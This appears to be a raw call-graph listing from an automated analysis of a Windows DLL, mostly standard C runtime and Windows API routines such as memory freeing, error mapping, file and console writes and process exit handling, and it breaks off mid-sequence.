7118->7127 7120 23666368 _free 20 API calls 7119->7120 7121 23666405 7120->7121 7122 236662ac ___std_exception_copy 26 API calls 7121->7122 7132 2366640f 7122->7132 7123 23666480 7148 23664e76 7123->7148 7126 236664ee 7128 2366571e _free 20 API calls 7126->7128 7127->7123 7129 23666561 7127->7129 7137 23666580 7127->7137 7128->7129 7163 2366679a 7129->7163 7130 236664e5 7130->7126 7130->7130 7134 23666573 7130->7134 7154 236685eb 7130->7154 7135 236662bc ___std_exception_copy 11 API calls 7134->7135 7136 2366657f 7135->7136 7138 2366658c 7137->7138 7138->7138 7139 2366637b __dosmaperr 20 API calls 7138->7139 7140 236665ba 7139->7140 7141 236685eb 26 API calls 7140->7141 7142 236665e6 7141->7142 7143 236662bc ___std_exception_copy 11 API calls 7142->7143 7144 23666615 ___scrt_fastfail 7143->7144 7145 236666b6 FindFirstFileExA 7144->7145 7146 23666705 7145->7146 7147 23666580 26 API calls 7146->7147 7149 23664e8b 7148->7149 7150 23664e87 7148->7150 7149->7150 7151 2366637b __dosmaperr 20 API calls 7149->7151 7150->7130 7152 23664eb9 7151->7152 7153 2366571e _free 20 API calls 7152->7153 7153->7150 7156 2366853a 7154->7156 7155 2366854f 7157 23666368 _free 20 API calls 7155->7157 7158 23668554 7155->7158 7156->7155 7156->7158 7161 2366858b 7156->7161 7159 2366857a 7157->7159 7158->7130 7160 236662ac ___std_exception_copy 26 API calls 7159->7160 7160->7158 7161->7158 7162 23666368 _free 20 API calls 7161->7162 7162->7159 7167 236667a4 7163->7167 7164 236667b4 7166 2366571e _free 20 API calls 7164->7166 7165 2366571e _free 20 API calls 7165->7167 7168 236667bb 7166->7168 7167->7164 7167->7165 7168->7132 6044 23669e71 6045 23669e95 6044->6045 6046 23669eae 6045->6046 6048 2366ac6b __startOneArgErrorHandling 6045->6048 6049 23669ef8 6046->6049 6052 2366aa53 6046->6052 6050 2366b2f0 21 API calls 6048->6050 6051 2366acad __startOneArgErrorHandling 6048->6051 6050->6051 6053 2366aa70 RtlDecodePointer 6052->6053 6055 2366aa80 6052->6055 6053->6055 6054 23662ada _ValidateLocalCookies 5 API calls 6057 2366ac67 6054->6057 6056 2366ab0d 6055->6056 6058 2366ab02 6055->6058 6060 2366aab7 6055->6060 6056->6058 6059 23666368 _free 20 API calls 6056->6059 6057->6049 6058->6054 6059->6058 6060->6058 6061 23666368 _free 20 API calls 6060->6061 6061->6058 6969 23661f3f 6970 23661f4b ___DestructExceptionObject 6969->6970 6987 2366247c 6970->6987 6972 23661f52 6973 23662041 6972->6973 6974 23661f7c 6972->6974 6981 23661f57 ___scrt_is_nonwritable_in_current_image 6972->6981 6976 23662639 ___scrt_fastfail 4 API calls 6973->6976 6998 236623de 6974->6998 6977 23662048 6976->6977 6978 23661f8b __RTC_Initialize 6978->6981 7001 236622fc RtlInitializeSListHead 6978->7001 6980 23661f99 ___scrt_initialize_default_local_stdio_options 7002 236646c5 6980->7002 6985 23661fb8 6985->6981 6986 23664669 _abort 5 API calls 6985->6986 6986->6981 6988 23662485 6987->6988 7010 23662933 IsProcessorFeaturePresent 6988->7010 6992 23662496 6997 2366249a 6992->6997 7021 236653c8 6992->7021 6995 236624b1 6995->6972 6996 23663529 ___vcrt_uninitialize 8 API calls 6996->6997 6997->6972 7057 236624b5 6998->7057 7000 236623e5 7000->6978 7001->6980 7004 236646dc 7002->7004 7003 23662ada _ValidateLocalCookies 5 API calls 7005 23661fad 7003->7005 7004->7003 7005->6981 7006 236623b3 7005->7006 7007 236623b8 ___scrt_release_startup_lock 7006->7007 7008 236623c1 7007->7008 7009 23662933 ___isa_available_init IsProcessorFeaturePresent 7007->7009 7008->6985 7009->7008 7011 23662491 7010->7011 7012 236634ea 7011->7012 7013 236634ef ___vcrt_initialize_winapi_thunks 7012->7013 7024 23663936 7013->7024 7016 236634fd 7016->6992 7018 23663505 7019 23663510 7018->7019 7020 23663972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7018->7020 7019->6992 7020->7016 7053 23667457 7021->7053 7025 2366393f 7024->7025 7027 23663968 7025->7027 7028 236634f9 7025->7028 7038 23663be0 7025->7038 7029 23663972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7027->7029 7028->7016 7030 236638e8 7028->7030 7029->7028 7043 23663af1 7030->7043 7035 23663918 7035->7018 7036 2366391b ___vcrt_uninitialize_ptd 6 API calls 7037 236638fd 7036->7037 7037->7018 7039 23663a82 try_get_function 5 API calls 7038->7039 7040 23663bfa 7039->7040 7041 23663c18 InitializeCriticalSectionAndSpinCount 7040->7041 7042 23663c03 7040->7042 7041->7042 7042->7025 7044 23663a82 try_get_function 5 API calls 7043->7044 7045 23663b0b 7044->7045 7046 23663b24 TlsAlloc 7045->7046 7047 236638f2 7045->7047 7047->7037 7048 23663ba2 7047->7048 7049 23663a82 try_get_function 5 API calls 7048->7049 7050 23663bbc 7049->7050 7051 23663bd7 TlsSetValue 7050->7051 7052 2366390b 7050->7052 7051->7052 7052->7035 7052->7036 7056 23667470 7053->7056 7054 23662ada _ValidateLocalCookies 5 API calls 7055 236624a3 7054->7055 7055->6995 7055->6996 7056->7054 7058 236624c4 7057->7058 7059 236624c8 7057->7059 7058->7000 7060 23662639 ___scrt_fastfail 4 API calls 7059->7060 7062 236624d5 ___scrt_release_startup_lock 7059->7062 7061 23662559 7060->7061 7062->7000 7169 23665bff 7177 23665d5c 7169->7177 7172 23665b7a __dosmaperr 20 API calls 7173 23665c1b 7172->7173 7174 23665c28 7173->7174 7175 23665c2b 11 API calls 7173->7175 7176 23665c13 7175->7176 7178 23665c45 __dosmaperr 5 API calls 7177->7178 7179 23665d83 7178->7179 7180 23665d9b TlsAlloc 7179->7180 7181 23665d8c 7179->7181 7180->7181 7182 23662ada _ValidateLocalCookies 5 API calls 7181->7182 7183 23665c09 7182->7183 7183->7172 7183->7176 7696 236667bf 7701 236667f4 7696->7701 7699 236667db 7700 2366571e _free 20 API calls 7700->7699 7702 23666806 7701->7702 7703 236667cd 7701->7703 7704 23666836 7702->7704 7705 2366680b 7702->7705 7703->7699 7703->7700 7704->7703 7712 236671d6 7704->7712 7706 2366637b __dosmaperr 20 API calls 7705->7706 7707 23666814 7706->7707 7709 2366571e _free 20 API calls 7707->7709 7709->7703 7710 23666851 7711 2366571e _free 20 API calls 7710->7711 7711->7703 7713 236671e1 7712->7713 7714 23667209 7713->7714 7715 236671fa 7713->7715 7716 23667218 7714->7716 7721 23668a98 7714->7721 7717 23666368 _free 20 API calls 7715->7717 7728 23668acb 7716->7728 7720 236671ff ___scrt_fastfail 7717->7720 7720->7710 7722 23668aa3 7721->7722 7723 23668ab8 RtlSizeHeap 7721->7723 7724 23666368 _free 20 API calls 7722->7724 7723->7716 7725 23668aa8 7724->7725 7726 236662ac ___std_exception_copy 26 API calls 7725->7726 7727 23668ab3 7726->7727 7727->7716 7729 23668ae3 7728->7729 7730 23668ad8 7728->7730 7732 23668af4 __dosmaperr 7729->7732 7733 23668aeb 7729->7733 7731 236656d0 21 API calls 7730->7731 7737 23668ae0 7731->7737 7735 23668b1e RtlReAllocateHeap 7732->7735 7736 23668af9 7732->7736 7739 2366474f __dosmaperr 7 API calls 7732->7739 7734 2366571e _free 20 API calls 7733->7734 7734->7737 7735->7732 7735->7737 7738 23666368 _free 20 API calls 7736->7738 7737->7720 7738->7737 7739->7732 7063 2366543d 7064 23665440 7063->7064 7065 236655a8 _abort 38 API calls 7064->7065 7066 2366544c 7065->7066 7740 23669db8 7741 23669dbf 7740->7741 7742 23669e20 7741->7742 7745 23669ddf 7741->7745 7743 2366a90e 7742->7743 7744 2366aa17 21 API calls 7742->7744 7746 23669e6e 7744->7746 7745->7743 7747 2366aa17 21 API calls 7745->7747 7748 2366a93e 7747->7748 7184 2366a1c6 IsProcessorFeaturePresent 7185 23667bc7 7186 23667bd3 ___DestructExceptionObject 7185->7186 7187 23667c0a _abort 7186->7187 7193 23665671 RtlEnterCriticalSection 7186->7193 7189 23667be7 7190 23667f86 __fassign 20 API calls 7189->7190 7191 23667bf7 7190->7191 7194 23667c10 7191->7194 7193->7189 7197 236656b9 RtlLeaveCriticalSection 7194->7197 7196 23667c17 7196->7187 7197->7196 6062 2366a945 6064 2366a96d 6062->6064 6063 2366a9a5 6064->6063 6065 2366a997 6064->6065 6066 2366a99e 6064->6066 6071 2366aa17 6065->6071 6075 2366aa00 6066->6075 6072 2366aa20 6071->6072 6079 2366b19b 6072->6079 6076 2366aa20 6075->6076 6077 2366b19b __startOneArgErrorHandling 21 API calls 6076->6077 6078 2366a9a3 6077->6078 6080 2366b1da __startOneArgErrorHandling 6079->6080 6085 2366b25c __startOneArgErrorHandling 6080->6085 6089 2366b59e 6080->6089 6082 2366b286 6083 2366b8b2 __startOneArgErrorHandling 20 API calls 6082->6083 6084 2366b292 6082->6084 6083->6084 6086 23662ada _ValidateLocalCookies 5 API calls 6084->6086 6085->6082 6087 236678a3 __startOneArgErrorHandling 5 API calls 6085->6087 6088 2366a99c 6086->6088 6087->6082 6090 2366b5c1 __raise_exc RaiseException 6089->6090 6091 2366b5bc 6090->6091 6091->6085 6092 2366af43 6093 2366af4d 6092->6093 6094 2366af59 6092->6094 6093->6094 6095 2366af52 CloseHandle 6093->6095 6095->6094 7067 23665303 7070 236650a5 7067->7070 7079 2366502f 7070->7079 7073 2366502f 5 API calls 7074 236650c3 7073->7074 7075 23665000 20 API calls 7074->7075 7076 236650ce 7075->7076 7077 23665000 20 API calls 7076->7077 7078 236650d9 7077->7078 7080 23665048 7079->7080 7081 23662ada _ValidateLocalCookies 5 API calls 7080->7081 7082 23665069 7081->7082 7082->7073 7083 23667103 GetCommandLineA GetCommandLineW 6096 23668640 6099 23668657 6096->6099 6100 23668665 6099->6100 6101 23668679 6099->6101 6102 23666368 _free 20 API calls 6100->6102 6103 23668693 6101->6103 6104 23668681 6101->6104 6105 2366866a 6102->6105 6110 23668652 6103->6110 6115 236654a7 6103->6115 6106 23666368 _free 20 API calls 6104->6106 6112 236662ac 6105->6112 6109 23668686 6106->6109 6111 236662ac ___std_exception_copy 26 API calls 6109->6111 6111->6110 6123 23666231 6112->6123 6114 236662b8 6114->6110 6116 236654c4 6115->6116 6117 236654ba 6115->6117 6116->6117 6144 23665af6 GetLastError 6116->6144 6117->6110 6119 236654e5 6164 23667a00 6119->6164 6124 23665b7a __dosmaperr 20 API calls 6123->6124 6125 23666247 6124->6125 6126 236662a6 6125->6126 6127 23666255 6125->6127 6134 236662bc IsProcessorFeaturePresent 6126->6134 6131 23662ada _ValidateLocalCookies 5 API calls 6127->6131 6129 236662ab 6130 23666231 ___std_exception_copy 26 API calls 6129->6130 6132 236662b8 6130->6132 6133 2366627c 6131->6133 6132->6114 6133->6114 6135 236662c7 6134->6135 6138 236660e2 6135->6138 6139 236660fe ___scrt_fastfail 6138->6139 6140 2366612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6139->6140 6141 236661fb ___scrt_fastfail 6140->6141 6142 23662ada _ValidateLocalCookies 5 API calls 6141->6142 6143 23666219 GetCurrentProcess TerminateProcess 6142->6143 6143->6129 6145 23665b0c 6144->6145 6146 23665b12 6144->6146 6147 23665e08 __dosmaperr 11 API calls 6145->6147 6148 2366637b __dosmaperr 20 API calls 6146->6148 6150 23665b61 SetLastError 6146->6150 6147->6146 6149 23665b24 6148->6149 6151 23665b2c 6149->6151 6152 23665e5e __dosmaperr 11 API calls 6149->6152 6150->6119 6153 2366571e _free 20 API calls 6151->6153 6154 23665b41 6152->6154 6155 23665b32 6153->6155 6154->6151 6156 23665b48 6154->6156 6157 23665b6d SetLastError 6155->6157 6158 2366593c __dosmaperr 20 API calls 6156->6158 6172 236655a8 6157->6172 6160 23665b53 6158->6160 6161 2366571e _free 20 API calls 6160->6161 6163 23665b5a 6161->6163 6163->6150 6163->6157 6165 23667a13 6164->6165 6166 236654fe 6164->6166 6165->6166 6321 23667f0f 6165->6321 6168 23667a2d 6166->6168 6169 23667a55 6168->6169 6170 23667a40 6168->6170 6169->6117 6170->6169 6456 23666d7e 6170->6456 6183 23667613 6172->6183 6175 236655b8 6176 236655c2 IsProcessorFeaturePresent 6175->6176 6182 236655e0 6175->6182 6178 236655cd 6176->6178 6180 236660e2 _abort 8 API calls 6178->6180 6180->6182 6213 23664bc1 6182->6213 6216 23667581 6183->6216 6186 2366766e 6187 2366767a _abort 6186->6187 6188 23665b7a __dosmaperr 20 API calls 6187->6188 6191 236676a7 _abort 6187->6191 6194 236676a1 _abort 6187->6194 6188->6194 6189 236676f3 6190 23666368 _free 20 API calls 6189->6190 6192 236676f8 6190->6192 6198 2366771f 6191->6198 6230 23665671 RtlEnterCriticalSection 6191->6230 6195 236662ac ___std_exception_copy 26 API calls 6192->6195 6194->6189 6194->6191 6212 236676d6 6194->6212 6195->6212 6199 2366777e 6198->6199 6201 23667776 6198->6201 6209 236677a9 6198->6209 6231 236656b9 RtlLeaveCriticalSection 6198->6231 6199->6209 6232 23667665 6199->6232 6204 23664bc1 _abort 28 API calls 6201->6204 6204->6199 6207 23665af6 _abort 38 API calls 6210 2366780c 6207->6210 6208 23667665 _abort 38 API calls 6208->6209 6235 2366782e 6209->6235 6211 23665af6 _abort 38 API calls 6210->6211 6210->6212 6211->6212 6239 2366bdc9 6212->6239 6243 2366499b 6213->6243 6219 23667527 6216->6219 6218 236655ad 6218->6175 6218->6186 6220 23667533 ___DestructExceptionObject 6219->6220 6225 23665671 RtlEnterCriticalSection 6220->6225 6222 23667541 6226 23667575 6222->6226 6224 23667568 _abort 6224->6218 6225->6222 6229 236656b9 RtlLeaveCriticalSection 6226->6229 6228 2366757f 6228->6224 6229->6228 6230->6198 6231->6201 6233 23665af6 _abort 38 API calls 6232->6233 6234 2366766a 6233->6234 6234->6208 6236 23667834 6235->6236 6238 236677fd 6235->6238 6242 236656b9 RtlLeaveCriticalSection 6236->6242 6238->6207 6238->6210 6238->6212 6240 23662ada _ValidateLocalCookies 5 API calls 6239->6240 6241 2366bdd4 6240->6241 6241->6241 6242->6238 6244 236649a7 _abort 6243->6244 6253 236649bf 6244->6253 6265 23664af5 GetModuleHandleW 6244->6265 6250 236649c7 6252 23664a3c 6250->6252 6263 23664a65 6250->6263 6275 2366527a 6250->6275 6256 23664a54 6252->6256 6278 23664669 6252->6278 6274 23665671 RtlEnterCriticalSection 6253->6274 6254 23664a82 6285 23664ab4 6254->6285 6255 23664aae 6261 2366bdc9 _abort 5 API calls 6255->6261 6258 23664669 _abort 5 API calls 6256->6258 6258->6263 6262 23664ab3 6261->6262 6282 23664aa5 6263->6282 6266 236649b3 6265->6266 6266->6253 6267 23664b39 GetModuleHandleExW 6266->6267 6268 23664b63 GetProcAddress 6267->6268 6269 23664b78 6267->6269 6268->6269 6270 23664b95 6269->6270 6271 23664b8c FreeLibrary 6269->6271 6272 23662ada _ValidateLocalCookies 5 API calls 6270->6272 6271->6270 6273 23664b9f 6272->6273 6273->6253 6274->6250 6293 23665132 6275->6293 6280 23664698 6278->6280 6279 23662ada _ValidateLocalCookies 5 API calls 6281 236646c1 6279->6281 6280->6279 6281->6256 6314 236656b9 RtlLeaveCriticalSection 6282->6314 6284 23664a7e 6284->6254 6284->6255 6315 23666025 6285->6315 6288 23664ae2 6291 23664b39 _abort 8 API calls 6288->6291 6289 23664ac2 GetPEB 6289->6288 6290 23664ad2 GetCurrentProcess TerminateProcess 6289->6290 6290->6288 6292 23664aea ExitProcess 6291->6292 6296 236650e1 6293->6296 6295 23665156 6295->6252 6297 236650ed ___DestructExceptionObject 6296->6297 6304 23665671 RtlEnterCriticalSection 6297->6304 6299 236650fb 6305 2366515a 6299->6305 6303 23665119 _abort 6303->6295 6304->6299 6308 2366517a 6305->6308 6309 23665182 6305->6309 6306 23662ada _ValidateLocalCookies 5 API calls 6307 23665108 6306->6307 6311 23665126 6307->6311 6308->6306 6309->6308 6310 2366571e _free 20 API calls 6309->6310 6310->6308 6312 236656b9 _abort RtlLeaveCriticalSection 6311->6312 6313 23665130 6312->6313 6313->6303 6314->6284 6316 2366604a 6315->6316 6320 23666040 6315->6320 6317 23665c45 __dosmaperr 5 API calls 6316->6317 6317->6320 6318 23662ada _ValidateLocalCookies 5 API calls 6319 23664abe 6318->6319 6319->6288 6319->6289 6320->6318 6322 23667f1b ___DestructExceptionObject 6321->6322 6323 23665af6 _abort 38 API calls 6322->6323 6324 23667f24 6323->6324 6327 23667f72 _abort 6324->6327 6333 23665671 RtlEnterCriticalSection 6324->6333 6326 23667f42 6334 23667f86 6326->6334 6327->6166 6332 236655a8 _abort 38 API calls 6332->6327 6333->6326 6335 23667f56 6334->6335 6336 23667f94 __fassign 6334->6336 6338 23667f75 6335->6338 6336->6335 6341 23667cc2 6336->6341 6455 236656b9 RtlLeaveCriticalSection 6338->6455 6340 23667f69 6340->6327 6340->6332 6342 23667d42 6341->6342 6345 23667cd8 6341->6345 6343 23667d90 6342->6343 6346 2366571e _free 20 API calls 6342->6346 6409 23667e35 6343->6409 6345->6342 6347 23667d0b 6345->6347 6353 2366571e _free 20 API calls 6345->6353 6348 23667d64 6346->6348 6349 23667d2d 6347->6349 6354 2366571e _free 20 API calls 6347->6354 6350 2366571e _free 20 API calls 6348->6350 6352 2366571e _free 20 API calls 6349->6352 6351 23667d77 6350->6351 6355 2366571e _free 20 API calls 6351->6355 6356 23667d37 6352->6356 6358 23667d00 6353->6358 6360 23667d22 6354->6360 6361 23667d85 6355->6361 6362 2366571e _free 20 API calls 6356->6362 6357 23667dfe 6363 2366571e _free 20 API calls 6357->6363 6369 236690ba 6358->6369 6359 23667d9e 6359->6357 6368 2366571e 20 API calls _free 6359->6368 6397 236691b8 6360->6397 6366 2366571e _free 20 API calls 6361->6366 6362->6342 6367 23667e04 6363->6367 6366->6343 6367->6335 6368->6359 6370 236691b4 6369->6370 6371 236690cb 6369->6371 6370->6347 6372 236690dc 6371->6372 6374 2366571e _free 20 API calls 6371->6374 6373 236690ee 6372->6373 6375 2366571e _free 20 API calls 6372->6375 6376 23669100 6373->6376 6377 2366571e _free 20 API calls 6373->6377 6374->6372 6375->6373 6378 23669112 6376->6378 6379 2366571e _free 20 API calls 6376->6379 6377->6376 6380 23669124 6378->6380 6382 2366571e _free 20 API calls 6378->6382 6379->6378 6381 23669136 6380->6381 6383 2366571e _free 20 API calls 6380->6383 6384 23669148 6381->6384 6385 2366571e _free 20 API calls 6381->6385 6382->6380 6383->6381 6386 2366915a 6384->6386 6387 2366571e _free 20 API calls 6384->6387 6385->6384 6388 2366916c 6386->6388 6390 2366571e _free 20 API calls 6386->6390 6387->6386 6389 2366917e 6388->6389 6391 2366571e _free 20 API calls 6388->6391 6392 23669190 6389->6392 6393 2366571e _free 20 API calls 6389->6393 6390->6388 6391->6389 6394 236691a2 6392->6394 6395 2366571e _free 20 API calls 6392->6395 6393->6392 6394->6370 6396 2366571e _free 20 API calls 6394->6396 6395->6394 6396->6370 6398 236691c5 6397->6398 6408 2366921d 6397->6408 6399 2366571e _free 20 API calls 6398->6399 6401 236691d5 6398->6401 6399->6401 6400 236691e7 6403 236691f9 6400->6403 6405 2366571e _free 20 API calls 6400->6405 6401->6400 6402 2366571e _free 20 API calls 6401->6402 6402->6400 6404 2366920b 6403->6404 6406 2366571e _free 20 API calls 6403->6406 6407 2366571e _free 20 API calls 6404->6407 6404->6408 6405->6403 6406->6404 6407->6408 6408->6349 6410 23667e60 6409->6410 6411 23667e42 6409->6411 6410->6359 6411->6410 6415 2366925d 6411->6415 6414 2366571e _free 20 API calls 6414->6410 6416 23667e5a 6415->6416 6417 2366926e 6415->6417 6416->6414 6451 23669221 6417->6451 6420 23669221 __fassign 20 API calls 6421 23669281 6420->6421 6422 23669221 __fassign 20 API calls 6421->6422 6423 2366928c 6422->6423 6424 23669221 __fassign 20 API calls 6423->6424 6425 23669297 6424->6425 6426 23669221 __fassign 20 API calls 6425->6426 6427 236692a5 6426->6427 6428 2366571e _free 20 API calls 6427->6428 6429 236692b0 6428->6429 6430 2366571e _free 20 API calls 6429->6430 6431 236692bb 6430->6431 6432 2366571e _free 20 API calls 6431->6432 6433 236692c6 6432->6433 6434 23669221 __fassign 20 API calls 6433->6434 6435 236692d4 6434->6435 6436 23669221 __fassign 20 API calls 6435->6436 6437 236692e2 6436->6437 6438 23669221 __fassign 20 API calls 6437->6438 6439 236692f3 6438->6439 6440 23669221 __fassign 20 API calls 6439->6440 6441 23669301 6440->6441 6442 23669221 __fassign 20 API calls 6441->6442 6443 2366930f 6442->6443 6444 2366571e _free 20 API calls 6443->6444 6445 2366931a 6444->6445 6446 2366571e _free 20 API calls 6445->6446 6447 23669325 6446->6447 6448 2366571e _free 20 API calls 6447->6448 6449 23669330 6448->6449 6450 2366571e _free 20 API calls 6449->6450 6450->6416 6452 23669258 6451->6452 6453 23669248 6451->6453 6452->6420 6453->6452 6454 2366571e _free 20 API calls 6453->6454 6454->6453 6455->6340 6457 23666d8a ___DestructExceptionObject 6456->6457 6458 23665af6 _abort 38 API calls 6457->6458 6463 23666d94 6458->6463 6460 23666e18 _abort 6460->6169 6462 236655a8 _abort 38 API calls 6462->6463 6463->6460 6463->6462 6464 2366571e _free 20 API calls 6463->6464 6465 23665671 RtlEnterCriticalSection 6463->6465 6466 23666e0f 6463->6466 6464->6463 6465->6463 6469 236656b9 RtlLeaveCriticalSection 6466->6469 6468 23666e16 6468->6463 6469->6468 7749 23667a80 7750 23667a8d 7749->7750 7751 2366637b __dosmaperr 20 API calls 7750->7751 7752 23667aa7 7751->7752 7753 2366571e _free 20 API calls 7752->7753 7754 23667ab3 7753->7754 7755 2366637b __dosmaperr 20 API calls 7754->7755 7759 23667ad9 7754->7759 7756 23667acd 7755->7756 7758 2366571e _free 20 API calls 7756->7758 7757 23665eb7 11 API calls 7757->7759 7758->7759 7759->7757 7760 23667ae5 7759->7760 6470 2366724e GetProcessHeap 6471 2366284f 6474 23662882 6471->6474 6477 23663550 6474->6477 6476 2366285d 6478 2366355d 6477->6478 6482 2366358a 6477->6482 6479 236647e5 ___std_exception_copy 21 API calls 6478->6479 6478->6482 6480 2366357a 6479->6480 6480->6482 6483 2366544d 6480->6483 6482->6476 6484 2366545a 6483->6484 6486 23665468 6483->6486 6484->6486 6490 2366547f 6484->6490 6485 23666368 _free 20 API calls 6487 23665470 6485->6487 6486->6485 6488 236662ac ___std_exception_copy 26 API calls 6487->6488 6489 2366547a 6488->6489 6489->6482 6490->6489 6491 23666368 _free 20 API calls 6490->6491 6491->6487 7084 2366220c 7085 23662215 7084->7085 7086 2366221a dllmain_dispatch 7084->7086 7088 236622b1 7085->7088 7089 236622c7 7088->7089 7091 236622d0 7089->7091 7092 23662264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7089->7092 7091->7086 7092->7091 7761 2366508a 7762 236650a2 7761->7762 7763 2366509c 7761->7763 7764 23665000 20 API calls 7763->7764 7764->7762 6492 23667b48 6502 23668ebf 6492->6502 6496 23667b55 6515 2366907c 6496->6515 6499 23667b7f 6500 2366571e _free 20 API calls 6499->6500 6501 23667b8a 6500->6501 6519 23668ec8 6502->6519 6504 23667b50 6505 23668fdc 6504->6505 6506 23668fe8 ___DestructExceptionObject 6505->6506 6539 23665671 RtlEnterCriticalSection 6506->6539 6508 2366905e 6553 23669073 6508->6553 6510 23668ff3 6510->6508 6512 23669032 RtlDeleteCriticalSection 6510->6512 6540 2366a09c 6510->6540 6511 2366906a _abort 6511->6496 6513 2366571e _free 20 API calls 6512->6513 6513->6510 6516 23667b64 RtlDeleteCriticalSection 6515->6516 6517 23669092 6515->6517 6516->6496 6516->6499 6517->6516 6518 2366571e _free 20 API calls 6517->6518 6518->6516 6520 23668ed4 ___DestructExceptionObject 6519->6520 6529 23665671 RtlEnterCriticalSection 6520->6529 6522 23668f77 6534 23668f97 6522->6534 6525 23668ee3 6525->6522 6528 23668e78 66 API calls 6525->6528 6530 23667b94 RtlEnterCriticalSection 6525->6530 6531 23668f6d 6525->6531 6526 23668f83 _abort 6526->6504 6528->6525 6529->6525 6530->6525 6537 23667ba8 RtlLeaveCriticalSection 6531->6537 6533 23668f75 6533->6525 6538 236656b9 RtlLeaveCriticalSection 6534->6538 6536 23668f9e 6536->6526 6537->6533 6538->6536 6539->6510 6541 2366a0a8 ___DestructExceptionObject 6540->6541 6542 2366a0ce 6541->6542 6543 2366a0b9 6541->6543 6552 2366a0c9 _abort 6542->6552 6556 23667b94 RtlEnterCriticalSection 6542->6556 6544 23666368 _free 20 API calls 6543->6544 6546 2366a0be 6544->6546 6548 236662ac ___std_exception_copy 26 API calls 6546->6548 6547 2366a0ea 6557 2366a026 6547->6557 6548->6552 6550 2366a0f5 6573 2366a112 6550->6573 6552->6510 6821 236656b9 RtlLeaveCriticalSection 6553->6821 6555 2366907a 6555->6511 6556->6547 6558 2366a033 6557->6558 6559 2366a048 6557->6559 6560 23666368 _free 20 API calls 6558->6560 6565 2366a043 6559->6565 6576 23668e12 6559->6576 6562 2366a038 6560->6562 6563 236662ac ___std_exception_copy 26 API calls 6562->6563 6563->6565 6565->6550 6566 2366907c 20 API calls 6567 2366a064 6566->6567 6582 23667a5a 6567->6582 6569 2366a06a 6589 2366adce 6569->6589 6572 2366571e _free 20 API calls 6572->6565 6820 23667ba8 RtlLeaveCriticalSection 6573->6820 6575 2366a11a 6575->6552 6577 23668e26 6576->6577 6578 23668e2a 6576->6578 6577->6566 6578->6577 6579 23667a5a 26 API calls 6578->6579 6580 23668e4a 6579->6580 6604 23669a22 6580->6604 6583 23667a66 6582->6583 6584 23667a7b 6582->6584 6585 23666368 _free 20 API calls 6583->6585 6584->6569 6586 23667a6b 6585->6586 6587 236662ac ___std_exception_copy 26 API calls 6586->6587 6588 23667a76 6587->6588 6588->6569 6590 2366adf2 6589->6590 6591 2366addd 6589->6591 6593 2366ae2d 6590->6593 6597 2366ae19 6590->6597 6592 23666355 __dosmaperr 20 API calls 6591->6592 6594 2366ade2 6592->6594 6595 23666355 __dosmaperr 20 API calls 6593->6595 6596 23666368 _free 20 API calls 6594->6596 6598 2366ae32 6595->6598 6603 2366a070 6596->6603 6777 2366ada6 6597->6777 6600 23666368 _free 20 API calls 6598->6600 6601 2366ae3a 6600->6601 6602 236662ac ___std_exception_copy 26 API calls 6601->6602 6602->6603 6603->6565 6603->6572 6605 23669a2e ___DestructExceptionObject 6604->6605 6606 23669a36 6605->6606 6607 23669a4e 6605->6607 6629 23666355 6606->6629 6608 23669aec 6607->6608 6613 23669a83 6607->6613 6611 23666355 __dosmaperr 20 API calls 6608->6611 6614 23669af1 6611->6614 6612 23666368 _free 20 API calls 6626 23669a43 _abort 6612->6626 6632 23668c7b RtlEnterCriticalSection 6613->6632 6616 23666368 _free 20 API calls 6614->6616 6618 23669af9 6616->6618 6617 23669a89 6619 23669aa5 6617->6619 6620 23669aba 6617->6620 6621 236662ac ___std_exception_copy 26 API calls 6618->6621 6622 23666368 _free 20 API calls 6619->6622 6633 23669b0d 6620->6633 6621->6626 6625 23669aaa 6622->6625 6624 23669ab5 6684 23669ae4 6624->6684 6627 23666355 __dosmaperr 20 API calls 6625->6627 6626->6577 6627->6624 6630 23665b7a __dosmaperr 20 API calls 6629->6630 6631 2366635a 6630->6631 6631->6612 6632->6617 6634 23669b3b 6633->6634 6672 23669b34 6633->6672 6635 23669b5e 6634->6635 6636 23669b3f 6634->6636 6640 23669baf 6635->6640 6641 23669b92 6635->6641 6637 23666355 __dosmaperr 20 API calls 6636->6637 6639 23669b44 6637->6639 6638 23662ada _ValidateLocalCookies 5 API calls 6642 23669d15 6638->6642 6643 23666368 _free 20 API calls 6639->6643 6650 23669bc5 6640->6650 6687 2366a00b 6640->6687 6644 23666355 __dosmaperr 20 API calls 6641->6644 6642->6624 6645 23669b4b 6643->6645 6648 23669b97 6644->6648 6649 236662ac ___std_exception_copy 26 API calls 6645->6649 6652 23666368 _free 20 API calls 6648->6652 6649->6672 6690 236696b2 6650->6690 6655 23669b9f 6652->6655 6653 23669bd3 6658 23669bd7 6653->6658 6659 23669bf9 6653->6659 6654 23669c0c 6656 23669c66 WriteFile 6654->6656 6657 23669c20 6654->6657 6660 236662ac ___std_exception_copy 26 API calls 6655->6660 6664 23669c89 GetLastError 6656->6664 6666 23669bef 6656->6666 6661 23669c56 6657->6661 6662 23669c28 6657->6662 6663 23669ccd 6658->6663 6697 23669645 6658->6697 6702 23669492 GetConsoleCP 6659->6702 6660->6672 6728 23669728 6661->6728 6667 23669c46 6662->6667 6668 23669c2d 6662->6668 6671 23666368 _free 20 API calls 6663->6671 6663->6672 6664->6666 6666->6663 6666->6672 6675 23669ca9 6666->6675 6720 236698f5 6667->6720 6668->6663 6713 23669807 6668->6713 6674 23669cf2 6671->6674 6672->6638 6677 23666355 __dosmaperr 20 API calls 6674->6677 6678 23669cc4 6675->6678 6679 23669cb0 6675->6679 6677->6672 6735 23666332 6678->6735 6680 23666368 _free 20 API calls 6679->6680 6682 23669cb5 6680->6682 6683 23666355 __dosmaperr 20 API calls 6682->6683 6683->6672 6776 23668c9e RtlLeaveCriticalSection 6684->6776 6686 23669aea 6686->6626 6740 23669f8d 6687->6740 6762 23668dbc 6690->6762 6692 236696c2 6693 236696c7 6692->6693 6694 23665af6 _abort 38 API calls 6692->6694 6693->6653 6693->6654 6695 236696ea 6694->6695 6695->6693 6696 23669708 GetConsoleMode 6695->6696 6696->6693 6698 2366969f 6697->6698 6701 2366966a 6697->6701 6698->6666 6699 2366a181 WriteConsoleW CreateFileW 6699->6701 6700 236696a1 GetLastError 6700->6698 6701->6698 6701->6699 6701->6700 6703 236694f5 6702->6703 6708 23669607 6702->6708 6707 2366957b WideCharToMultiByte 